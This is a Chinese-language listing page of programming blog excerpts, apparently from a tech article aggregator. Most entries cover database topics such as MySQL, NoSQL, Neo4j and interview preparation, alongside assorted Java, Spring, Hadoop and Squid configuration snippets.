  • 基于neo4j的汽车领域知识图谱问答系统 程序员~小强 neo4j汽车知识图谱
    介绍:请使用前务必读一下README.md,系统主要是汽车领域相关知识图谱问答系统,包括了汽车的价格、品牌等十几个关系实体,十几个关系,数据量实体7000+,关系9000+整个系统使用django构建,自带了一份数据,比较完整,有初始化数据接口,每次务必初始化数据后使用,neo4j按照README.md初始化,注意初始化可能需要一个多小时。底层数据库知识图谱采用neo4j,关系型数据库采用sqli
  • 浅谈MySQL日志文件|手撕MySQL|对线面试官 -白 泽- 手撕MySQL面试经验mysql数据库
    关注微信公众号【程序员白泽】,进入白泽的知识分享星球前言上周五面试了字节的第三面,深感数据库知识的重要,我也意识到在平时的学习中,自己对于数据库的学习较为薄弱。甚至在有过一定实习经验之后,依旧因为开发分工的原因,对数据库方面的知识掌握依旧不多。我也相信,很多人对MySQL的索引、日志、多版本并发控制、ACID等等都只停留在八股文的阶段。因此我打算接下来一段时间潜心学习一下MySQL数据库相关的知识
  • 32个Java面试必考点-09(上)消息队列Kafka架构与原理 机智阳 java面试kafka后端架构开发语言
    本课时主要讲解消息队列与数据库相关的知识,重点讲解三部分知识点:1.Kafka的架构与消息交互流程;2.数据库事务的4大特性和分类;3.MySQL相关的内容,比如索引、MySQL调优等。消息队列与数据库知识点先来看看相关知识点汇总,如下图。首先为了防止歧义进行说明,本课时中提到的“队列“就是指“消息队列“。消息队列来看消息队列的应用场景,也就是队列能解决哪些问题。&队列可以对应用进行解耦合,应用之
  • 【数据库】数据库知识树概况,可以转成思维导图 chentao326 MySQL数据库database
    数据库pdf版的思维导图数据库系统数据库系统基本概念data数据DB数据库以特定的组织结构存放在计算机的存储介质中的相互关联的数据集合DBS数据库应用系统DatabaseSystemDBA数据库管理员DBS硬件osDBMSDBAPP用户以及开发人员数据模型概念模型E-R模型语义对象模型逻辑模型层次模型网状模型关系模型面向对象模型对象关系模型现实世界的数据化过程三个世界现实信息机器概念模型中的基本概
  • nosql数据库知识点总结 左岸2420 大数据数据库nosql数据库
    目录1、什么是nosql数据库,它包括哪些文档数据库建数据哪一种是最简单的2、什么是文档数据库3、创建mongodb时默认会建造三个数据库,是哪三个4、mongodb支持的数据类型有哪些5、它的常规语句有哪些6、副本集和分片集有什么作用复制性能7、副本集的副本节点之间如何获得主节点数据8、启动mongo时mongodmongos是什么意思,之间有什么区别9、cap原则10、nosql的全称11、b
  • 向量数据库知识积累 for62 AIGCAIGCembedding
    前言前文4篇文章主要介绍了MySQL与Redis相关知识,可能某些同学看来略显枯燥。本文基于最近大热的aigc,介绍其中的核心工具,内部数据存储:向量数据库。本人在最近的项目中也是初次使用了向量数据库,对其中的向量处理、数据分块、大文件存储等略有认知。向量数据库知识积累向量数据库介绍向量数据库是专门用来存储和查询向量的数据库。向量数据库通过提供k-NN索引等专门索引来提供向量相似性搜索,并管理矢量
  • 2020-09-26 数据库知识点 Double_G9
    数据库知识点1.数据库服务概念介绍数据库:主要用于对大量数据信息可以进行有效的分析处理数据库服务器:MySQLMaridb数据库:存储数据分类用户信息--用户信息库商品信息---商品交易信息---支付业务数据表:数据表信息数据字段:存储具体内容信息,存储信息规范数据行:真实每一条合法的数据信息2.数据库服务环境安装部署windows系统中部署数据库:mysqlhttps://dev.mysql.c
  • 产品经理必须懂技术的那点事(下) 陈情丶
    (咱们接着昨儿的来。)四:数据库知识:1:数据库类似于一个进行数据存储的仓库,运行在服务器中,数据按照一定的规则存储,可以对数据库中的数据进行增删改查的操作。主要分为关系型数据库和非关系型数据库。2:关系型数据库:指一种基于关系模型的数据库,关系模型折射出现实世界中的实体关系,将现实世界中各种实体及实体之间的关系通过关系模型表达出来.实体A具有三个属性,实体B具有三个属性,他们之间以某一种关系关联
  • 【Java面试必备】数据库与SQL深度解析:面试常问问题全攻略及实战答案 陈大狗Ayer 校招逐梦数据库java面试
    尊敬的CSDN读者们,在Java工程师招聘过程中,数据库知识和SQL技能同样占据着举足轻重的地位。本篇博客将详细梳理关于数据库与SQL部分的高频面试问题,并提供全面解答,助您轻松应对技术面试挑战。一、数据库基本概念与设计原则问题1:请简述关系型数据库的基本概念以及三大范式是什么?答案:关系型数据库:以表格的形式存储数据,通过行和列组织信息,各表之间通过主键和外键建立关联关系。主要优点包括数据结构化
  • Neo4j数据库知识图谱查询关联人物关系和cypher查询 yayun_kg 知识图谱图计算neo4j图计算
    Cypher语句介绍:Cypher是一种声明式图查询语言,表达高效查询和更新图数据库。例子:声明式编程是一种编程范式,即构建计算机程序的结构和元素的一种风格,它表达了计算的逻辑而没有描述其控制流程。常用的声明性语言包括数据库查询语言(例如SQL,XQuery),正则表达式,逻辑编程,函数式编程和配置管理系统。命令式编程以明确的步骤实现算法。match相当于SQLselectcypher查询语言的基
  • 软件测试系统学习流程和常见面试题 木卯小台
    在学习软件测试的时候你是否会感觉到不知从何下手?今天教导你们软件测试学习的系统流程和面试常见的问题。学习流程一、必备技能1.编程基础,能看懂前端页面,掌握一门语言:php/python/java等2.数据库知识,建议准备好sql语言,能掌握高级查询使用基本可以应对了。3.软件测试理论,这个大家都不陌生,也是必考的了,应该可以轻松应付。要注意准备下web和app测试和性能测试这块,现在做web、ap
  • 数据库与ORM开发手册 玉韬 数据库开发数据库
    前言在数字化时代,数据库技术已成为我们日常生活和工作中不可或缺的一部分。无论是处理个人信息、管理企业数据,还是构建大型应用程序,数据库都发挥着核心作用。作为一个数据库开发者,我们不仅要掌握基本的数据库知识,还要了解如何高效地设计和维护数据库系统。这篇数据库开发手册正是为了帮助我更好地掌握数据库开发的各个方面而编写的。提示:数据库规约内容引自阿里《java开发手册》一、MySQL数据库规约建表规约说
  • MySQL表的约束 dong132697 MySQL笔记
    文章目录前言一、表的约束空属性notnull默认值default列描述commentzerofill主键自增长约束唯一键约束外键约束综合案例前言一、表的约束前面我们在学习数据库知识时,知道了当我们向数据库中插入数据时,如果数据不合法,那么MySQL不会允许数据插入成功,这也算是MySQL对数据合法性的一种约束。但是仅仅靠这一种约束是不够的。虽然真正约束字段的是数据类型,但是数据类型约束很单一,需要
  • 「数据库知识」——SQL处理学生表 无名之辈W 数据库面试题数据库mysqlsql数据分析
    喊了八十变要复习SQL,终于有时间了~( ̄. ̄)~❤文章目录前言:了解数据库与SQL语言概念区分:SQL基础用法1.创建数据库2.数据库的查看与使用3.表格的查看与新建4.插入数据5.查询数据一、模块一:简单的查询与统计Day11.查询所有学生的数学成绩,显示学生姓名name,分数score,由高到低2.统计每个学生的总成绩,显示字段:姓名,总成绩3.统计每个学生的总成绩(由于学生可能有重复名字)
  • 数据库知识汇总之MySQL 刘一说 后端技术栈实战总结软件环境数据库mysqljava开发语言
    目录MySQL数据库特点MySQL下载MySQL配置文件初始化MySQL配置安装MySQL服务启动MySQL服务登录数据库修改数据库登录密码MySQL错误代码1130MySQL数据库特点MySQL是一个开源关系型数据库管理系统(RDBMS),由Oracle公司维护和开发。它使用SQL语言进行数据库管理和操作。MySQL具有以下特点:开源免费:MySQL是开源软件,可以免费使用,而且社区活跃,有大量
  • 数据库知识——Mysql、MongoDB 指腚好使 数据库mysqlmongodb
    数据库mysql数据库创建表-数据类型+整数类型int+浮点类型double+日期类型date/timestamp+字符串类型charvarchar*可变varchar(n)必须要给字符最大长度n使用:用户名,密码,身份证号码。n=4040个字节,20个字符*不可变是char不需要给字符长度,使用;商品描述、歌词...*空间换时间*text长度不限-首先足够用,其次尽量小createtable表名
  • 【一文详解】知识分享:(MySQL关系型数据库知识进阶) Carson's blog 数据库数据库mysqljava数据库开发经验分享
    进阶体系结构Mysql体系结构:连接层位于最上层,是一些客户端和连接服务,主要完成一些类似于连接处理,授权认证及相关的安全方案。服务器也会为安全接入的每个客户端验证它所具有的操作权限。服务层第二层,主要完成大多数的核心服务功能,如sql接口,并完成缓存的查询,sql的分析和优化,部分内置函数的执行。所有跨存储引擎的功能也在这一层实现,如:过程,函数等。引擎层第三层,存储引擎真正的负责了mysql中
  • 软件测试工程师要掌握哪些专业技能 软件测试老莫 软件测试
    1.软件测试理论知识:掌握软件测试的基本概念、测试方法、测试技术和测试流程,包括黑盒测试、白盒测试、性能测试、安全测试等。2.编程语言和脚本语言:掌握至少一种编程语言和脚本语言,例如Java、Python、JavaScript等。3.自动化测试工具:熟悉自动化测试工具的使用,例如Selenium、Appium、JMeter等。4.数据库知识:了解SQL语言和数据库基本操作,能够编写SQL语句查询和
  • 一些数据库知识点总结 暖男大海哥 数据库数据库
    DB2数据库:从数据库表中第I条记录开始检索J条记录SELECT*FROM(SELECTA.*,ROW_NUMBER()OVER()ASNFROM(SELECT*FROMtable_name)ASA)WHEREN>IANDN=MMySQL数据库:利用mySQL的LIMIT函数,LIMIT[offset,]rows从数据库表中M条记录开始检索N条记录的语句为:SELECT*FROM表名称LIMITM
  • 程序员必备的数据库知识 2:Join 算法 快乐非自愿 数据库
    前言连接(Join)是关系数据库重要特性,它和事务常被作为数据库与文件系统的两个重要区别项。程序员江湖一直流传着某某baba的神秘开发宝典,其中数据库部分有重要一条避免过多表的Join,奈何Join特性实在是好用,广大程序员们无视着宝典的谆谆教诲,依旧每天乐此不疲的使用这Join特性。那数据库有哪些连接算法呢?它们的实现方式是怎样呢?它们之间又有什么区别呢?为什么需要这么多不同的连接算法呢?如果你
  • MySQL数据库知识重构(1) 运维仙人 数据库
    平时工作会用到mysql数据,但是没有对知识点进行系统的学习,知识比较零散。所以为了将mysql吃透,方便以后工作。从现在起,开始知识点重构的旅程。MySQL数据库?MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle公司。MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。My
  • 数据库知识汇总之NoSQL 刘一说 后端技术栈数据结构实战总结数据库nosqljavaoraclesqlitesqldatabase
    目录数据库常见分类关系型数据库NoSQL数据库NoSQL数据库5大类型NoSQL数据库在大数据时代的优势数据库常见分类数据库可以根据不同的标准进行分类,以下是一些常见的数据库分类方式:关系型数据库(RDBMS):这是最常见的数据库类型,使用表格来组织数据,包括MySQL、Oracle、SQLServer等。非关系型数据库(NoSQL):这种数据库不使用表格来组织数据,而是使用其他结构化的方式,包括
  • 【计算机开题报告】社区文化宣传网站设计与实现 Easton111 计算机开题报告php微信小程序毕设java课程设计毕设选题计算机
    题目:社区文化宣传网站设计与实现一、研究或设计的目的和意义:(一)研究目的:通过本次课题能够将所学的Java编程知识以及Mysql数据库知识应用于社区文化宣传网站的开发,完成社区文化宣传网站的设计与实现。同时培养学生综合运用所学理论知识和技能;培养学生调查研究,查阅技术文献、资料、手册以及编写技术文献的能力;通过本次课题,学生能够在指导老师的指导下,独立完成课题相关内容,比如:需求分析、概要设计和
  • 刚斩获头条美团的offer,Java开发面试题详解(带答案) Java程序V Java面试Java编程Javajava面试开发语言
    出于篇幅考虑,这篇文章只给出了10个专题,每个专题给出了大约4道题的答案,包含Java基础、Jvm、开源框架知识、操作系统、多线程、网络知识、架构设计与分布式数据库知识、消息队列、缓存等,更多专题持续更新中,争取三天内发出来。自我准备面试的过程,当时网上找了些试题,但是没答案,然后一边梳理自己的知识,一般结合自己平时钻研的知识和工作经验,自己对试题进行了整理,解答。如果想要完整版的可于文末自行领取
  • 期末备考数据库知识点(sql server2008) lucid_dreamings 数据库
    空间数据库目录空间数据库绪论1.数据库系统概述2.数据库系统DBS组成3.数据库系统结构4.数据模型第一章关系数据库基础1关系数据库模型概述2关系数据结构相关概念3关系的形式化定义4样例关系数据库模型5关系的码与完整性6关系代数第二章关系数据库语言SQL1什么是SQL2数据定义DDL3数据操纵DML4数据查询DQL5数据控制DCL第三章索引与视图1索引的作用和类型2创建和使用索引3视图的概念和作用
  • LeetCode[位运算] - #137 Single Number II Cwind javaAlgorithmLeetCode题解位运算
    原题链接:#137 Single Number II  要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现三次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间   难度:中等   分析: 与#136类似,都是考察位运算。不过出现两次的可以使用异或运算的特性 n XOR n = 0, n XOR 0 = n,即某一
  • 《JavaScript语言精粹》笔记 aijuans JavaScript
    0、JavaScript的简单数据类型包括数字、字符创、布尔值(true/false)、null和undefined值,其它值都是对象。 1、JavaScript只有一个数字类型,它在内部被表示为64位的浮点数。没有分离出整数,所以1和1.0的值相同。 2、NaN是一个数值,表示一个不能产生正常结果的运算结果。NaN不等于任何值,包括它本身。可以用函数isNaN(number)检测NaN,但是
  • 你应该更新的Java知识之常用程序库 Kai_Ge java
    在很多人眼中,Java 已经是一门垂垂老矣的语言,但并不妨碍 Java 世界依然在前进。如果你曾离开 Java,云游于其它世界,或是每日只在遗留代码中挣扎,或许是时候抬起头,看看老 Java 中的新东西。 Guava Guava[gwɑ:və],一句话,只要你做Java项目,就应该用Guava(Github)。 guava 是 Google 出品的一套 Java 核心库,在我看来,它甚至应该
  • HttpClient 120153216 httpclient
    /** * 可以传对象的请求转发,对象已流形式放入HTTP中 */ public static Object doPost(Map<String,Object> parmMap,String url) { Object object = null; HttpClient hc = new HttpClient(); String fullURL
  • Django model字段类型清单 2002wmj django
    Django 通过 models 实现数据库的创建、修改、删除等操作,本文为模型中一般常用的类型的清单,便于查询和使用: AutoField:一个自动递增的整型字段,添加记录时它会自动增长。你通常不需要直接使用这个字段;如果你不指定主键的话,系统会自动添加一个主键字段到你的model。(参阅自动主键字段) BooleanField:布尔字段,管理工具里会自动将其描述为checkbox。 Cha
  • 在SQLSERVER中查找消耗CPU最多的SQL 357029540 SQL Server
    返回消耗CPU数目最多的10条语句 SELECT TOP 10    total_worker_time/execution_count AS avg_cpu_cost, plan_handle,    execution_count,    (SELECT SUBSTRING(text, statement_start_of
  • Myeclipse项目无法部署,Undefined exploded archive location 7454103 eclipseMyEclipse
    做个备忘! 错误信息为:       Undefined exploded archive location 原因:           在工程转移过程中,导致工程的配置文件出错; 解决方法:    
  • GMT时间格式转换 adminjun GMT时间转换
    普通的时间转换问题我这里就不再罗嗦了,我想大家应该都会那种低级的转换问题吧,现在我向大家总结一下如何转换GMT时间格式,这种格式的转换方法网上还不是很多,所以有必要总结一下,也算给有需要的朋友一个小小的帮助啦。 1、可以使用 SimpleDateFormat SimpleDateFormat    EEE-三位星期 d-天 MMM-月 yyyy-四位年
  • Oracle数据库新装连接串问题 aijuans oracle数据库
    割接新装了数据库,客户端登陆无问题,apache/cgi-bin程序有问题,sqlnet.log日志如下: Fatal NI connect error 12170.   VERSION INFORMATION:         TNS for Linux: Version 10.2.0.4.0 - Product
  • 回顾java数组复制 ayaoxinchao java数组
    在写这篇文章之前,也看了一些别人写的,基本上都是大同小异。文章是对java数组复制基础知识的回顾,算是作为学习笔记,供以后自己翻阅。首先,简单想一下这个问题:为什么要复制数组?我的个人理解:在我们在利用一个数组时,在每一次使用,我们都希望它的值是初始值。这时我们就要对数组进行复制,以达到原始数组值的安全性。java数组复制大致分为3种方式:①for循环方式 ②clone方式 ③arrayCopy方
  • java web会话监听并使用spring注入 bewithme Java Web
            在java web应用中,当你想在建立会话或移除会话时,让系统做某些事情,比如说,统计在线用户,每当有用户登录时,或退出时,那么可以用下面这个监听器来监听。        import java.util.ArrayList; import java.ut
  • NoSQL数据库之Redis数据库管理(Redis的常用命令及高级应用) bijian1013 redis数据库NoSQL
    一 .Redis常用命令         Redis提供了丰富的命令对数据库和各种数据库类型进行操作,这些命令可以在Linux终端使用。         a.键值相关命令         b.服务器相关命令 1.键值相关命令       &
  • java枚举序列化问题 bingyingao java枚举序列化
    对象在网络中传输离不开序列化和反序列化。而如果序列化的对象中有枚举值就要特别注意一些发布兼容问题: 1.加一个枚举值 新机器代码读分布式缓存中老对象,没有问题,不会抛异常。 老机器代码读分布式缓存中新对像,反序列化会中断,所以在所有机器发布完成之前要避免出现新对象,或者提前让老机器拥有新增枚举的jar。 2.删一个枚举值 新机器代码读分布式缓存中老对象,反序列
  • 【Spark七十八】Spark Kyro序列化 bit1129 spark
    当使用SparkContext的saveAsObjectFile方法将对象序列化到文件,以及通过objectFile方法将对象从文件反序列出来的时候,Spark默认使用Java的序列化以及反序列化机制,通常情况下,这种序列化机制是很低效的,Spark支持使用Kyro作为对象的序列化和反序列化机制,序列化的速度比java更快,但是使用Kyro时要注意,Kyro目前还是有些bug。 Spark
  • Hybridizing OO and Functional Design bookjovi erlanghaskell
      推荐博文: Tell Above, and Ask Below - Hybridizing OO and Functional Design 文章中把OO和FP讲的深入透彻,里面把smalltalk和haskell作为典型的两种编程范式代表语言,此点本人极为同意,smalltalk可以说是最能体现OO设计的面向对象语言,smalltalk的作者Alan kay也是OO的最早先驱,
  • Java-Collections Framework学习与总结-HashMap BrokenDreams Collections
            开发中常常会用到这样一种数据结构,根据一个关键字,找到所需的信息。这个过程有点像查字典,拿到一个key,去字典表中查找对应的value。Java1.0版本提供了这样的类java.util.Dictionary(抽象类),基本上支持字典表的操作。后来引入了Map接口,更好的描述的这种数据结构。  &nb
  • 读《研磨设计模式》-代码笔记-职责链模式-Chain Of Responsibility bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 业务逻辑:项目经理只能处理500以下的费用申请,部门经理是1000,总经理不设限。简单起见,只同意“Tom”的申请 * bylijinnan */ abstract class Handler { /*
  • Android中启动外部程序 cherishLC android
    1、启动外部程序 引用自: http://blog.csdn.net/linxcool/article/details/7692374 //方法一 Intent intent=new Intent(); //包名 包名+类名(全路径) intent.setClassName("com.linxcool", "com.linxcool.PlaneActi
  • summary_keep_rate coollyj SUM
    BEGIN /*DECLARE minDate varchar(20) ; DECLARE maxDate varchar(20) ;*/ DECLARE stkDate varchar(20) ; DECLARE done int default -1; /* 游标中 注册服务器地址 */ DE
  • hadoop hdfs 添加数据目录出错 daizj hadoophdfs扩容
    由于原来配置的hadoop data目录快要用满了,故准备修改配置文件增加数据目录,以便扩容,但由于疏忽,把core-site.xml, hdfs-site.xml配置文件dfs.datanode.data.dir 配置项增加了配置目录,但未创建实际目录,重启datanode服务时,报如下错误: 2014-11-18 08:51:39,128 WARN org.apache.hadoop.h
  • grep 目录级联查找 dongwei_6688 grep
           在Mac或者Linux下使用grep进行文件内容查找时,如果给定的目标搜索路径是当前目录,那么它默认只搜索当前目录下的文件,而不会搜索其下面子目录中的文件内容,如果想级联搜索下级目录,需要使用一个“-r”参数: grep -n -r "GET" .   上面的命令将会找出当前目录“.”及当前目录中所有下级目录
  • yii 修改模块使用的布局文件 dcj3sjt126com yiilayouts
    方法一:yii模块默认使用系统当前的主题布局文件,如果在主配置文件中配置了主题比如: 'theme'=>'mythm', 那么yii的模块就使用 protected/themes/mythm/views/layouts 下的布局文件; 如果未配置主题,那么 yii的模块就使用  protected/views/layouts 下的布局文件, 总之默认不是使用自身目录 pr
  • 设计模式之单例模式 come_for_dream 设计模式单例模式懒汉式饿汉式双重检验锁失败无序写入
                    今天该来的面试还没来,这个店估计不会来电话了,安静下来写写博客也不错,没事翻了翻小易哥的博客甚至与大牛们之间的差距,基础知识不扎实建起来的楼再高也只能是危楼罢了,陈下心回归基础把以前学过的东西总结一下。   *********************************
  • 8、数组 豆豆咖啡 二维数组数组一维数组
      一、概念       数组是同一种类型数据的集合。其实数组就是一个容器。   二、好处       可以自动给数组中的元素从0开始编号,方便操作这些元素   三、格式   //一维数组 1,元素类型[] 变量名 = new 元素类型[元素的个数] int[] arr =
  • Decode Ways hcx2013 decode
    A message containing letters from A-Z is being encoded to numbers using the following mapping: 'A' -> 1 'B' -> 2 ... 'Z' -> 26 Given an encoded message containing digits, det
  • Spring4.1新特性——异步调度和事件机制的异常处理 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • squid3(高命中率)缓存服务器配置 liyonghui160com
        系统:centos 5.x   需要的软件:squid-3.0.STABLE25.tar.gz 1.下载squid wget http://www.squid-cache.org/Versions/v3/3.0/squid-3.0.STABLE25.tar.gz tar zxf squid-3.0.STABLE25.tar.gz &&
  • 避免Java应用中NullPointerException的技巧和最佳实践 pda158 java
    1) 从已知的String对象中调用equals()和equalsIgnoreCase()方法,而非未知对象。   总是从已知的非空String对象中调用equals()方法。因为equals()方法是对称的,调用a.equals(b)和调用b.equals(a)是完全相同的,这也是为什么程序员对于对象a和b这么不上心。如果调用者是空指针,这种调用可能导致一个空指针异常 Object unk
  • 如何在Swift语言中创建http请求 shoothao httpswift
    概述:本文通过实例从同步和异步两种方式上回答了”如何在Swift语言中创建http请求“的问题。 如果你对Objective-C比较了解的话,对于如何创建http请求你一定驾轻就熟了,而新语言Swift与其相比只有语法上的区别。但是,对才接触到这个崭新平台的初学者来说,他们仍然想知道“如何在Swift语言中创建http请求?”。 在这里,我将作出一些建议来回答上述问题。常见的
  • Spring事务的传播方式 uule spring事务
    传播方式:        新建事务       required       required_new   - 挂起当前         非事务方式运行       supports   &nbs
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他